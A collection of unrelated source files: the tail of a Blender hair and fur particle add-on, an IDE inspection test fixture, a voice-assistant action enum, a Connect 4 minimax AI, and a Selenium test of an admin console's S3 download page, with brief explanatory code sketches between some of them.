hairParticles.settings.kink_frequency = 6
hairParticles.settings.kink_shape = 0.4
hairParticles.settings.kink_flat = 0.8
######################################################################
########################Short Dark Hair##########################
elif scene.hair_type == '2':
###############Create New Material##################
# add new material
hairMaterial = bpy.data.materials.new('ShortDarkHairMat')
ob.data.materials.append(hairMaterial)
#Material settings
hairMaterial.preview_render_type = "HAIR"
hairMaterial.diffuse_color = (0.560, 0.536, 0.506)
hairMaterial.specular_color = (0.196, 0.177, 0.162)
hairMaterial.specular_intensity = 0.5
hairMaterial.specular_hardness = 100
hairMaterial.ambient = 0
hairMaterial.use_cubic = True
hairMaterial.use_transparency = True
hairMaterial.alpha = 0
hairMaterial.use_transparent_shadows = True
#strand
hairMaterial.strand.use_blender_units = True
hairMaterial.strand.root_size = 0.0002
hairMaterial.strand.tip_size = 0.0001
hairMaterial.strand.size_min = 0.3
hairMaterial.strand.width_fade = 0.1
hairMaterial.strand.shape = 0
hairMaterial.strand.blend_distance = 0.001
# add texture
hairTex = bpy.data.textures.new("ShortDarkHair", type='BLEND')
hairTex.use_preview_alpha = True
hairTex.use_color_ramp = True
ramp = hairTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.004025,0.002732,0.002428,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.141,0.122,0.107,0.2]
rampElement1 = rampElements.new(0.202)
rampElement1.color = [0.01885,0.0177,0.01827,0.65]
rampElement2 = rampElements.new(0.499)
rampElement2.color = [0.114,0.109,0.09822,0.87]
rampElement3 = rampElements.new(0.828)
rampElement3.color = [0.141,0.127,0.117,0.64]
# add texture to material
MTex = hairMaterial.texture_slots.add()
MTex.texture = hairTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
hairParticles = bpy.context.object.particle_systems.active
hairParticles.name = "ShortDarkHair"
hairParticles.settings.type = "HAIR"
hairParticles.settings.use_advanced_hair = True
hairParticles.settings.hair_step = 2
hairParticles.settings.count = 450
hairParticles.settings.normal_factor = 0.007
hairParticles.settings.factor_random = 0.001
hairParticles.settings.use_dynamic_rotation = True
hairParticles.settings.material = NumberOfMaterials
hairParticles.settings.use_strand_primitive = True
hairParticles.settings.use_hair_bspline = True
hairParticles.settings.render_step = 3
hairParticles.settings.length_random = 0.3
hairParticles.settings.display_step = 3
# children
hairParticles.settings.child_type = "INTERPOLATED"
hairParticles.settings.rendered_child_count = 200
hairParticles.settings.virtual_parents = 1
hairParticles.settings.clump_factor = 0.425
hairParticles.settings.clump_shape = 0.1
hairParticles.settings.roughness_endpoint = 0.003
hairParticles.settings.roughness_end_shape = 5
return {'FINISHED'}
####
######## FUR LAB ########
####
class FurLabPanel(bpy.types.Panel):
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'TOOLS'
    bl_label = "Fur Lab"
    bl_context = "objectmode"
    bl_options = {'DEFAULT_CLOSED'}
    bl_category = "Create"

    def draw(self, context):
        active_obj = bpy.context.active_object
        active_scn = bpy.context.scene.name
        layout = self.layout
        col = layout.column(align=True)
        WhatToDo = getActionToDo(active_obj)
        if WhatToDo == "GENERATE":
            col.operator("fur.generate_fur", text="Create Fur")
            col.prop(context.scene, "fur_type")
        else:
            col.label(text="Select mesh object")
        if active_scn == "TestFurScene":
            col.operator("fur.switch_back", text="Switch back to scene")
        else:
            col.operator("fur.test_scene", text="Create Test Scene")
# TO DO
"""
class saveSelection(bpy.types.Operator):
    bl_idname = "save.selection"
    bl_label = "Save Selection"
    bl_description = "Save selected particles"
    bl_register = True
    bl_undo = True

    def execute(self, context):
        return {'FINISHED'}
"""
class testScene5(bpy.types.Operator):
    bl_idname = "fur.switch_back"
    bl_label = "Switch back to scene"
    bl_description = "If you want to keep this scene, switch scenes in the info window"
    bl_register = True
    bl_undo = True

    def execute(self, context):
        scene = bpy.context.scene
        bpy.data.scenes.remove(scene)
        return {'FINISHED'}
class testScene6(bpy.types.Operator):
    bl_idname = "fur.test_scene"
    bl_label = "Create test scene"
    bl_description = "You can switch scenes in the info panel"
    bl_register = True
    bl_undo = True

    def execute(self, context):
        # add new scene
        bpy.ops.scene.new(type="NEW")
        scene = bpy.context.scene
        scene.name = "TestFurScene"
        # render settings
        render = scene.render
        render.resolution_x = 1920
        render.resolution_y = 1080
        render.resolution_percentage = 50
        # add new world
        world = bpy.data.worlds.new("FurWorld")
        scene.world = world
        world.use_sky_blend = True
        world.use_sky_paper = True
        world.horizon_color = (0.004393,0.02121,0.050)
        world.zenith_color = (0.03335,0.227,0.359)
        # add text
        bpy.ops.object.text_add(location=(-0.292,0,-0.152), rotation=(1.571,0,0))
        text = bpy.context.active_object
        text.scale = (0.05,0.05,0.05)
        text.data.body = "Fur Lab"
        # add material to text
        textMaterial = bpy.data.materials.new('textMaterial')
        text.data.materials.append(textMaterial)
        textMaterial.use_shadeless = True
        # add camera
        bpy.ops.object.camera_add(location=(0,-1,0), rotation=(1.571,0,0))
        cam = bpy.context.active_object.data
        cam.lens = 50
        cam.display_size = 0.1
        # add key light (spot lamp)
        bpy.ops.object.lamp_add(type="SPOT", location=(-0.7,-0.5,0.3), rotation=(1.223,0,-0.960))
        lamp1 = bpy.context.active_object.data
        lamp1.name = "Key Light"
        lamp1.energy = 1.5
        lamp1.distance = 1.5
        lamp1.shadow_buffer_soft = 5
        lamp1.shadow_buffer_size = 8192
        lamp1.shadow_buffer_clip_end = 1.5
        lamp1.spot_blend = 0.5
        # add fill light (spot lamp 2)
        bpy.ops.object.lamp_add(type="SPOT", location=(0.7,-0.6,0.1), rotation=(1.571,0,0.785))
        lamp2 = bpy.context.active_object.data
        lamp2.name = "Fill Light"
        lamp2.color = (0.874,0.874,1)
        lamp2.energy = 0.5
        lamp2.distance = 1.5
        lamp2.shadow_buffer_soft = 5
        lamp2.shadow_buffer_size = 4096
        lamp2.shadow_buffer_clip_end = 1.5
        lamp2.spot_blend = 0.5
        # rim light (currently disabled)
        """
        # add spot lamp3
        bpy.ops.object.lamp_add(type="SPOT", location=(0.191,0.714,0.689), rotation=(0.891,0,2.884))
        lamp3 = bpy.context.active_object.data
        lamp3.name = "Rim Light"
        lamp3.color = (0.194,0.477,1)
        lamp3.energy = 3
        lamp3.distance = 1.5
        lamp3.shadow_buffer_soft = 5
        lamp3.shadow_buffer_size = 4096
        lamp3.shadow_buffer_clip_end = 1.5
        lamp3.spot_blend = 0.5
        """
        # add sphere
        bpy.ops.mesh.primitive_uv_sphere_add(size=0.1)
        bpy.ops.object.shade_smooth()
        return {'FINISHED'}
class GenerateFur(bpy.types.Operator):
    bl_idname = "fur.generate_fur"
    bl_label = "Generate Fur"
    bl_description = "Create fur on the active mesh"
    bl_register = True
    bl_undo = True

    def execute(self, context):
        # references to the current .blend file's main data blocks
        blend_data = context.blend_data
        ob = bpy.context.active_object
        scene = context.scene

        ######################################################################
        ########################Short Fur########################
        if scene.fur_type == '0':
            ###############Create New Material##################
            # add new material
            furMaterial = bpy.data.materials.new('Fur 1')
            ob.data.materials.append(furMaterial)
            # Material settings
            furMaterial.preview_render_type = "HAIR"
            furMaterial.diffuse_color = (0.287, 0.216, 0.04667)
            furMaterial.specular_color = (0.604, 0.465, 0.136)
            furMaterial.specular_intensity = 0.3
            furMaterial.ambient = 0
            furMaterial.use_cubic = True
            furMaterial.use_transparency = True
            furMaterial.alpha = 0
            furMaterial.use_transparent_shadows = True
            # strand
            furMaterial.strand.use_blender_units = True
            furMaterial.strand.root_size = 0.00030
            furMaterial.strand.tip_size = 0.00010
            furMaterial.strand.size_min = 0.7
            furMaterial.strand.width_fade = 0.1
            furMaterial.strand.shape = 0.061
            furMaterial.strand.blend_distance = 0.001
            # add texture
            furTex = bpy.data.textures.new("Fur1Tex", type='BLEND')
            furTex.use_preview_alpha = True
            furTex.use_color_ramp = True
            ramp = furTex.color_ramp
            rampElements = ramp.elements
            rampElements[0].position = 0
            rampElements[0].color = [0.114,0.05613,0.004025,0.38]
            rampElements[1].position = 1
            rampElements[1].color = [0.267,0.155,0.02687,0]
            rampElement1 = rampElements.new(0.111)
            rampElement1.color = [0.281,0.168,0.03157,0.65]
            rampElement2 = rampElements.new(0.366)
            rampElement2.color = [0.288,0.135,0.006242,0.87]
            rampElement3 = rampElements.new(0.608)
            rampElement3.color = [0.247,0.113,0.006472,0.8]
            rampElement4 = rampElements.new(0.828)
            rampElement4.color = [0.253,0.09919,0.01242,0.64]
            # add texture to material
            MTex = furMaterial.texture_slots.add()
            MTex.texture = furTex
            MTex.texture_coords = "STRAND"
            MTex.use_map_alpha = True
            ###############Create Particles##################
            # Add new particle system
            NumberOfMaterials = len(ob.data.materials)
            bpy.ops.object.particle_system_add()
            # Particle settings
            furParticles = bpy.context.object.particle_systems.active
            furParticles.name = "Fur1Par"
            furParticles.settings.type = "HAIR"
            furParticles.settings.use_advanced_hair = True
            furParticles.settings.count = 500
            furParticles.settings.normal_factor = 0.05
            furParticles.settings.factor_random = 0.001
            furParticles.settings.use_dynamic_rotation = True
            furParticles.settings.material = NumberOfMaterials
            furParticles.settings.use_strand_primitive = True
            furParticles.settings.use_hair_bspline = True
            furParticles.settings.render_step = 5
            furParticles.settings.length_random = 0.5
            furParticles.settings.display_step = 5
            # children
            furParticles.settings.child_type = "INTERPOLATED"
            furParticles.settings.child_length = 0.134
            furParticles.settings.create_long_hair_children = True
            furParticles.settings.clump_factor = 0.55
            furParticles.settings.roughness_endpoint = 0.005
            furParticles.settings.roughness_end_shape = 5
            furParticles.settings.roughness_2 = 0.003
            furParticles.settings.roughness_2_size = 0.230
        ######################################################################
        ########################Dalmatian Fur##########################
        elif scene.fur_type == '1':
            ###############Create New Material##################
            # add new material
            furMaterial = bpy.data.materials.new('Fur2Mat')
            ob.data.materials.append(furMaterial)
            # Material settings
            furMaterial.preview_render_type = "HAIR"
            furMaterial.diffuse_color = (0.300, 0.280, 0.280)
            furMaterial.specular_color = (1.0, 1.0, 1.0)
            furMaterial.specular_intensity = 0.500
            furMaterial.specular_hardness = 50
            furMaterial.ambient = 0
            furMaterial.use_cubic = True
            furMaterial.use_transparency = True
            furMaterial.alpha = 0
            furMaterial.use_transparent_shadows = True
            # strand
            furMaterial.strand.use_blender_units = True
            furMaterial.strand.root_size = 0.00030
            furMaterial.strand.tip_size = 0.00010
            furMaterial.strand.size_min = 0.7
            furMaterial.strand.width_fade = 0.1
            furMaterial.strand.shape = 0.061
            furMaterial.strand.blend_distance = 0.001
            # add texture
            furTex = bpy.data.textures.new("Fur2Tex", type='BLEND')
            furTex.name = "Fur2"
            furTex.use_preview_alpha = True
            furTex.use_color_ramp = True
            ramp = furTex.color_ramp
            rampElements = ramp.elements
            rampElements[0].position = 0
            rampElements[0].color = [1.0,1.0,1.0,1.0]
            rampElements[1].position = 1
            rampElements[1].color = [1.0,1.0,1.0,0.0]
            rampElement1 = rampElements.new(0.116)
            rampElement1.color = [1.0,1.0,1.0,1.0]
            # add texture to material
            MTex = furMaterial.texture_slots.add()
            MTex.texture = furTex
            MTex.texture_coords = "STRAND"
            MTex.use_map_alpha = True
            # add texture 2
            furTex = bpy.data.textures.new("Fur2bTex", type='CLOUDS')
            furTex.name = "Fur2b"
            furTex.use_preview_alpha = False
            furTex.cloud_type = "COLOR"
            furTex.noise_type = "HARD_NOISE"
            furTex.noise_scale = 0.06410
            furTex.use_color_ramp = True
            ramp = furTex.color_ramp
            rampElements = ramp.elements
            rampElements[0].position = 0
            rampElements[0].color = [1.0,1.0,1.0,1.0]
            rampElements[1].position = 1
            rampElements[1].color = [0.0,0.0,0.0,1.0]
            rampElement1 = rampElements.new(0.317)
            rampElement1.color = [1.0,1.0,1.0,1.0]
            rampElement2 = rampElements.new(0.347)
            rampElement2.color = [0.0,0.0,0.0,1.0]
            # add texture 2 to material
            MTex = furMaterial.texture_slots.add()
            MTex.texture = furTex
            MTex.texture_coords = "GLOBAL"
            MTex.use_map_alpha = True
            ###############Create Particles##################
            # Add new particle system
            NumberOfMaterials = len(ob.data.materials)
            bpy.ops.object.particle_system_add()
            # Particle settings
            furParticles = bpy.context.object.particle_systems.active
            furParticles.name = "Fur2Par"
            furParticles.settings.type = "HAIR"
            furParticles.settings.use_advanced_hair = True
            furParticles.settings.count = 500
            furParticles.settings.normal_factor = 0.05
            furParticles.settings.factor_random = 0.001
            furParticles.settings.use_dynamic_rotation = True
            furParticles.settings.material = NumberOfMaterials
            furParticles.settings.use_strand_primitive = True
            furParticles.settings.use_hair_bspline = True
            furParticles.settings.render_step = 5
            furParticles.settings.length_random = 0.5
            furParticles.settings.display_step = 5
            # children
            furParticles.settings.child_type = "INTERPOLATED"
            furParticles.settings.child_length = 0.07227
            furParticles.settings.create_long_hair_children = True
            furParticles.settings.clump_factor = 0.55
            furParticles.settings.roughness_endpoint = 0.005
            furParticles.settings.roughness_end_shape = 5
            furParticles.settings.roughness_2 = 0.003
            furParticles.settings.roughness_2_size = 0.230
        ######################################################################
        ########################Spotted Fur##########################
        elif scene.fur_type == '2':
            ###############Create New Material##################
            # add new material
            furMaterial = bpy.data.materials.new('Fur3Mat')
            ob.data.materials.append(furMaterial)
            # Material settings
            furMaterial.preview_render_type = "HAIR"
            furMaterial.diffuse_color = (0.300, 0.280, 0.280)
            furMaterial.specular_color = (1.0, 1.0, 1.0)
            furMaterial.specular_intensity = 0.500
            furMaterial.specular_hardness = 50
            furMaterial.use_specular_ramp = True
            ramp = furMaterial.specular_ramp
            rampElements = ramp.elements
            rampElements[0].position = 0
            rampElements[0].color = [0.0356,0.0152,0.009134,0]
            rampElements[1].position = 1
            rampElements[1].color = [0.352,0.250,0.231,1]
            rampElement1 = rampElements.new(0.255)
            rampElement1.color = [0.214,0.08244,0.0578,0.31]
            rampElement2 = rampElements.new(0.594)
            rampElement2.color = [0.296,0.143,0.0861,0.72]
            furMaterial.ambient = 0
            furMaterial.use_cubic = True
            furMaterial.use_transparency = True
            furMaterial.alpha = 0
            furMaterial.use_transparent_shadows = True
            # strand
            furMaterial.strand.use_blender_units = True
            furMaterial.strand.root_size = 0.00030
            furMaterial.strand.tip_size = 0.00015
            furMaterial.strand.size_min = 0.450
            furMaterial.strand.width_fade = 0.1
            furMaterial.strand.shape = 0.02
            furMaterial.strand.blend_distance = 0.001
            # add texture
            furTex = bpy.data.textures.new("Fur3Tex", type='BLEND')
            furTex.name = "Fur3"
            furTex.use_preview_alpha = True
            furTex.use_color_ramp = True
            ramp = furTex.color_ramp
            rampElements = ramp.elements
            rampElements[0].position = 0
            rampElements[0].color = [0.009721,0.006049,0.003677,0.38]
            rampElements[1].position = 1
            rampElements[1].color = [0.04231,0.02029,0.01444,0.16]
            rampElement1 = rampElements.new(0.111)
            rampElement1.color = [0.01467,0.005307,0.00316,0.65]
            rampElement2 = rampElements.new(0.366)
            rampElement2.color = [0.0272,0.01364,0.01013,0.87]
            rampElement3 = rampElements.new(0.608)
            rampElement3.color = [0.04445,0.02294,0.01729,0.8]
            rampElement4 = rampElements.new(0.828)
            rampElement4.color = [0.04092,0.0185,0.01161,0.64]
            # add texture to material
            MTex = furMaterial.texture_slots.add()
            MTex.texture = furTex
            MTex.texture_coords = "STRAND"
            MTex.use_map_alpha = True
            # add texture 2
            furTex = bpy.data.textures.new("Fur3bTex", type='CLOUDS')
            furTex.name = "Fur3b"
            furTex.use_preview_alpha = True
            furTex.cloud_type = "COLOR"
            furTex.use_color_ramp = True
            ramp = furTex.color_ramp
            rampElements = ramp.elements
            rampElements[0].position = 0
            rampElements[0].color = [0.009721,0.006049,0.003677,0.38]
            rampElements[1].position = 1
            rampElements[1].color = [0.04231,0.02029,0.01444,0.16]
            rampElement1 = rampElements.new(0.111)
            rampElement1.color = [0.01467,0.005307,0.00316,0.65]
            rampElement2 = rampElements.new(0.366)
            rampElement2.color = [0.0272,0.01364,0.01013,0.87]
            rampElement3 = rampElements.new(0.608)
            rampElement3.color = [0.04445,0.02294,0.01729,0.8]
            rampElement4 = rampElements.new(0.828)
            rampElement4.color = [0.04092,0.0185,0.01161,0.64]
            # add texture 2 to material
            MTex = furMaterial.texture_slots.add()
            MTex.texture = furTex
            MTex.texture_coords = "GLOBAL"
            MTex.use_map_alpha = False
            ###############Create Particles##################
            # Add new particle system
            NumberOfMaterials = len(ob.data.materials)
            bpy.ops.object.particle_system_add()
            # Particle settings
            furParticles = bpy.context.object.particle_systems.active
            furParticles.name = "Fur3Par"
            furParticles.settings.type = "HAIR"
            furParticles.settings.use_advanced_hair = True
            furParticles.settings.count = 500
            furParticles.settings.normal_factor = 0.05
            furParticles.settings.factor_random = 0.001
            furParticles.settings.use_dynamic_rotation = True
            furParticles.settings.material = NumberOfMaterials
            furParticles.settings.use_strand_primitive = True
            furParticles.settings.use_hair_bspline = True
            furParticles.settings.render_step = 5
            furParticles.settings.length_random = 0.5
            furParticles.settings.display_step = 5
            # children
            furParticles.settings.child_type = "INTERPOLATED"
            furParticles.settings.child_length = 0.134
            furParticles.settings.create_long_hair_children = True
            furParticles.settings.clump_factor = 0.55
            furParticles.settings.roughness_endpoint = 0.005
            furParticles.settings.roughness_end_shape = 5
            furParticles.settings.roughness_2 = 0.003
            furParticles.settings.roughness_2_size = 0.230
        return {'FINISHED'}
def register():
    bpy.utils.register_module(__name__)
    bpy.types.Scene.grass_type = EnumProperty(
        name="Type",
        description="Select the type of grass",
        items=[("0","Green Grass","Generate particle grass"),
               ("1","Grassy Field","Generate particle grass"),
               ("2","Clumpy Grass","Generate particle grass"),
              ],
        default='0')
    bpy.types.Scene.hair_type = EnumProperty(
        name="Type",
        description="Select the type of hair",
        items=[("0","Long Red Straight Hair","Generate particle Hair"),
               ("1","Long Brown Curl Hair","Generate particle Hair"),
               ("2","Short Dark Hair","Generate particle Hair"),
              ],
        default='0')
    bpy.types.Scene.fur_type = EnumProperty(
        name="Type",
        description="Select the type of fur",
        items=[("0","Short Fur","Generate particle Fur"),
               ("1","Dalmatian","Generate particle Fur"),
               ("2","Spotted Fur","Generate particle Fur"),
              ],
        default='0')


def unregister():
    bpy.utils.unregister_module(__name__)
    del bpy.types.Scene.grass_type
    del bpy.types.Scene.hair_type
    del bpy.types.Scene.fur_type


if __name__ == "__main__":
    register()
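The blend textures in the add-on above are driven entirely by color-ramp elements, each a position in [0, 1] plus an RGBA value. How such a ramp evaluates between its stops can be sketched outside Blender with plain linear interpolation; `evaluate_ramp` below is an illustrative helper (not a bpy API call), and the element list mirrors the "Fur1Tex" ramp set up above.

```python
# Minimal sketch of how a color ramp interpolates between its elements.
# Each element is (position, [r, g, b, a]); Blender's default ramp
# interpolation is linear, which is what this assumes.

def evaluate_ramp(elements, pos):
    elements = sorted(elements, key=lambda e: e[0])
    if pos <= elements[0][0]:        # clamp below the first stop
        return list(elements[0][1])
    if pos >= elements[-1][0]:       # clamp above the last stop
        return list(elements[-1][1])
    for (p0, c0), (p1, c1) in zip(elements, elements[1:]):
        if p0 <= pos <= p1:
            t = (pos - p0) / (p1 - p0)
            return [a + (b - a) * t for a, b in zip(c0, c1)]

# Elements mirroring the "Fur1Tex" ramp configured above.
fur1_ramp = [
    (0.0,   [0.114, 0.05613, 0.004025, 0.38]),
    (0.111, [0.281, 0.168,   0.03157,  0.65]),
    (0.366, [0.288, 0.135,   0.006242, 0.87]),
    (0.608, [0.247, 0.113,   0.006472, 0.8]),
    (0.828, [0.253, 0.09919, 0.01242,  0.64]),
    (1.0,   [0.267, 0.155,   0.02687,  0.0]),
]

color = evaluate_ramp(fur1_ramp, 0.5)   # RGBA somewhere between the 0.366 and 0.608 stops
```

Along a hair strand, `texture_coords = "STRAND"` maps the ramp position to root-to-tip distance, so the alpha channel fading to 0 at position 1.0 is what tapers the strand tips.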
# ============================================================
# File: python/testData/inspections/PyRedeclarationInspection/redeclaredTopLevel.py
# Repo: truthiswill/intellij-community (Apache-2.0)
# ============================================================
def TopLevelBoo():
    pass
<warning descr="Redeclared 'TopLevelBoo' defined above without usage">TopLevelBoo</warning> = 1
<warning descr="Redeclared 'TopLevelBoo' defined above without usage">TopLevelBoo</warning> = 2
class <warning descr="Redeclared 'TopLevelBoo' defined above without usage">TopLevelBoo</warning>:
    pass
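This fixture feeds an IDE redeclaration inspection; the `<warning>` tags mark the spans expected to be highlighted. At runtime the same pattern is perfectly legal Python — each statement simply rebinds the module-level name, which is why the inspection reports a warning rather than an error. A minimal illustration (names chosen to mirror the fixture):

```python
def TopLevelBoo():        # first binding: a function
    return "function"

TopLevelBoo = 1           # rebinds the name; the function is no longer reachable
TopLevelBoo = 2           # rebinds again, the earlier value was never used

class TopLevelBoo:        # the final binding wins
    pass

print(type(TopLevelBoo))  # → <class 'type'>
```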
# ============================================================
# File: jarvy/actions.py
# Repo: jarvy/jarvy (MIT)
# ============================================================
class Actions:
def __init__(self):
pass
about_jarvy = 1
direct_address = 2
about_master = 3
search_google = 4
search_wolfram = 5
search_wikipedia = 6
say_sorry = 7
# def enum(**enums):
# return type('Enum', (), enums)
#
# actions = enum(about_jarvy=1,
# direct_address=2,
# about_master=3,
# search_google=4,
# search_wolfram=5,
# search_wikipedia=6,
# say_sorry=7
# )
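The commented-out `enum(**enums)` helper above predates the standard library's `enum` module; on Python 3.4+ the same table of action codes can be expressed with `enum.IntEnum`. A sketch (the `Action` class and its member names are illustrative, mirroring the class attributes above):

```python
from enum import IntEnum

class Action(IntEnum):
    ABOUT_JARVY = 1
    DIRECT_ADDRESS = 2
    ABOUT_MASTER = 3
    SEARCH_GOOGLE = 4
    SEARCH_WOLFRAM = 5
    SEARCH_WIKIPEDIA = 6
    SAY_SORRY = 7

# IntEnum members compare equal to plain ints, so any existing
# integer-based dispatch code keeps working unchanged.
print(Action.SEARCH_GOOGLE == 4)   # → True
print(Action(7).name)              # → SAY_SORRY
```

The advantage over bare class attributes is that `Action(7)` round-trips a stored integer back to a named, printable member.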
# ============================================================
# File: minimaxAI.py
# Repo: MihirJoe/Connect4 (MIT)
# ============================================================
import numpy as np
import math
import random
from board import *
import settings
# implements minimax with alpha-beta pruning
def minimax_alphabeta(board, moveCount, depth, alpha, beta, maximizingPlayer):
    valid_columns = all_valid_columns(board)
    random.shuffle(valid_columns)  # shuffle the valid columns so we do not always search in the same order

    # Leave the recursion at the depth limit or if the board contains a win.
    # if the depth is reached, return the current value of the heuristic
    if depth == 0:
        return None, score_board(board, settings.AI)
    # if the board is full or has a win with the theoretical move
    if is_end_node(board):
        # return score of a win for the AI while factoring in the number of moves
        if is_win(board, settings.AI):
            return None, 9999999 - moveCount
        # return score of a win for the player while factoring in the number of moves
        if is_win(board, settings.PLAYER):
            return None, -9999999 + moveCount
        else:
            return None, 0

    # Maximizing player section.
    if maximizingPlayer:
        bestScore = -math.inf  # initialize best score
        # loop through all open/valid columns
        for col in valid_columns:
            boardCopy = board.copy()
            add_token(boardCopy, col, settings.AI)
            newScore = minimax_alphabeta(boardCopy, moveCount + 1, depth - 1, alpha, beta, False)[1]  # score of the theoretical move
            # update bestScore if newScore is better
            if newScore > bestScore:
                bestScore = newScore
                column = col
            # update alpha
            alpha = max(alpha, bestScore)
            if alpha >= beta:
                break
        return column, bestScore
    # Minimizing player section.
    else:
        bestScore = math.inf  # initialize best score
        # loop through all open/valid columns
        for col in valid_columns:
            boardCopy = board.copy()
            add_token(boardCopy, col, settings.PLAYER)
            newScore = minimax_alphabeta(boardCopy, moveCount + 1, depth - 1, alpha, beta, True)[1]
            # if newScore is less than bestScore (a better option here), update best score
            if newScore < bestScore:
                bestScore = newScore
                column = col
            # update beta
            beta = min(beta, bestScore)
            if alpha >= beta:
                break
        return column, bestScore
# implements minimax WITHOUT alpha-beta pruning
def minimax(board, moveCount, depth, maximizingPlayer):
    valid_columns = all_valid_columns(board)
    random.shuffle(valid_columns)  # shuffle the valid columns so we do not always search in the same order

    # Leave the recursion at the depth limit or if the board contains a win.
    # if the depth is reached, return the current value of the heuristic
    if depth == 0:
        return None, score_board(board, settings.AI)
    # if the board is full or has a win with the theoretical move
    if is_end_node(board):
        # return score of a win for the AI while factoring in the number of moves
        if is_win(board, settings.AI):
            return None, 9999999 - moveCount
        # return score of a win for the player while factoring in the number of moves
        if is_win(board, settings.PLAYER):
            return None, -9999999 + moveCount
        else:
            return None, 0

    # Maximizing player section.
    if maximizingPlayer:
        bestScore = -math.inf  # initialize best score
        # loop through all open/valid columns
        for col in valid_columns:
            boardCopy = board.copy()
            add_token(boardCopy, col, settings.AI)
            newScore = minimax(boardCopy, moveCount + 1, depth - 1, False)[1]  # score of the theoretical move
            # update bestScore if newScore is better
            if newScore > bestScore:
                bestScore = newScore
                column = col
        return column, bestScore
    # Minimizing player section.
    else:
        bestScore = math.inf  # initialize best score
        # loop through all open/valid columns
        for col in valid_columns:
            boardCopy = board.copy()
            add_token(boardCopy, col, settings.PLAYER)
            newScore = minimax(boardCopy, moveCount + 1, depth - 1, True)[1]
            # if newScore is less than bestScore (a better option here), update best score
            if newScore < bestScore:
                bestScore = newScore
                column = col
        return column, bestScore
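The pruning logic in `minimax_alphabeta` can be isolated from the Connect 4 board and checked on a toy game tree where leaves hold static scores. The sketch below (the tree and `minimax_tree` helper are illustrative, not from `board.py`) shows that alpha-beta returns the same value as a full search while evaluating fewer leaves:

```python
import math

def minimax_tree(node, maximizing, alpha=-math.inf, beta=math.inf, visited=None):
    """Minimax with alpha-beta over a nested-list game tree; leaves are ints."""
    if isinstance(node, int):          # leaf: return its static score
        if visited is not None:
            visited.append(node)
        return node
    best = -math.inf if maximizing else math.inf
    for child in node:
        score = minimax_tree(child, not maximizing, alpha, beta, visited)
        if maximizing:
            best = max(best, score)
            alpha = max(alpha, best)
        else:
            best = min(best, score)
            beta = min(beta, best)
        if alpha >= beta:              # remaining siblings cannot change the result
            break
    return best

# Classic textbook tree: the root value is 3, and once alpha reaches 3
# the later min-branches are cut off after their first leaf.
tree = [[3, 5], [2, 9], [0, 7]]
visited = []
value = minimax_tree(tree, maximizing=True, visited=visited)
print(value, len(visited))   # → 3 4   (only 4 of the 6 leaves were evaluated)
```

The same cutoff condition (`alpha >= beta`) appears in both branches of `minimax_alphabeta` above; the Connect 4 version just adds move ordering via `random.shuffle` and a depth-limited heuristic at the leaves.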
# ============================================================
# File: tests/src/Admin_console/S3_files_script.py
# Repo: JalajaTR/cQube (MIT)
# ============================================================
import time
import unittest
from selenium.webdriver.support.select import Select
from Data.parameters import Data
from get_dir import pwd
from reuse_func import GetData
class Test_s3files(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        cls.data = GetData()
        cls.p = pwd()
        cls.driver = cls.data.get_driver()
        cls.data.open_cqube_appln(cls.driver)
        print(cls.driver.title)
        cls.data.page_loading(cls.driver)
        cls.data.login_to_adminconsole(cls.driver)
    def test_navigate_to_s3files(self):
        self.driver.find_element_by_id(Data.Dashboard).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("downloads").click()
        self.data.page_loading(self.driver)
        if "s3FileDownload" in self.driver.current_url:
            print("s3FileDownload page is displayed")
        else:
            print("s3FileDownload page does not exist")
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("homeBtn").click()
        self.data.page_loading(self.driver)
    def test_s3files_icon(self):
        count = 0
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id('s3dwn').click()
        if "s3FileDownload" in self.driver.current_url:
            print("s3FileDownload page is displayed")
        else:
            print("s3FileDownload page does not exist")
            count = count + 1
        self.data.page_loading(self.driver)
        self.assertEqual(0, count, msg="S3files icon is not working")
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("homeBtn").click()
        self.data.page_loading(self.driver)
    def test_bucket_list(self):
        self.driver.find_element_by_id(Data.Dashboard).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("downloads").click()
        self.data.page_loading(self.driver)
        print("selecting each bucket name in turn")
        bucket_name = Select(self.driver.find_element_by_name("bucketName"))
        for i in range(1, len(bucket_name.options)):
            bucket_name.select_by_index(i)
            print(bucket_name.options[i].text, "is present and selected")
        self.data.page_loading(self.driver)
        self.assertNotEqual(0, len(bucket_name.options) - 1, msg="Bucket names do not exist")
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("homeBtn").click()
        self.data.page_loading(self.driver)
    def test_select_cqube_input(self):
        self.driver.find_element_by_id(Data.Dashboard).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("downloads").click()
        self.data.page_loading(self.driver)
        bucket_name = Select(self.driver.find_element_by_name("bucketName"))
        bucket_name.select_by_index(2)
        print(bucket_name.options[2].text, 'is selected')
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("homeBtn").click()
        self.data.page_loading(self.driver)
    def test_bucket(self):
        self.driver.find_element_by_id(Data.Dashboard).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("downloads").click()
        self.data.page_loading(self.driver)
        print("choosing radio button and downloading s3 files")
        bucket_name = Select(self.driver.find_element_by_name("bucketName"))
        for i in range(1, len(bucket_name.options) - 1):
            bucket_name.select_by_index(i)
            self.data.page_loading(self.driver)
            self.driver.find_element_by_xpath(Data.s3bucket_select1).click()
            self.data.page_loading(self.driver)
            self.driver.find_element_by_id("btn").click()
            time.sleep(3)
            self.data.page_loading(self.driver)
            self.driver.find_element_by_id("btn").click()
            time.sleep(3)
            self.data.page_loading(self.driver)
        self.driver.find_element_by_id("homeBtn").click()
        self.data.page_loading(self.driver)
    def test_cqubegj_raw(self):
        self.driver.find_element_by_id(Data.Dashboard).click()
        self.data.page_loading(self.driver)
        self.driver.find_element_by_id("downloads").click()
        self.data.page_loading(self.driver)
        bucket_name = Select(self.driver.find_element_by_name("bucketName"))
        bucket_name.select_by_index(1)
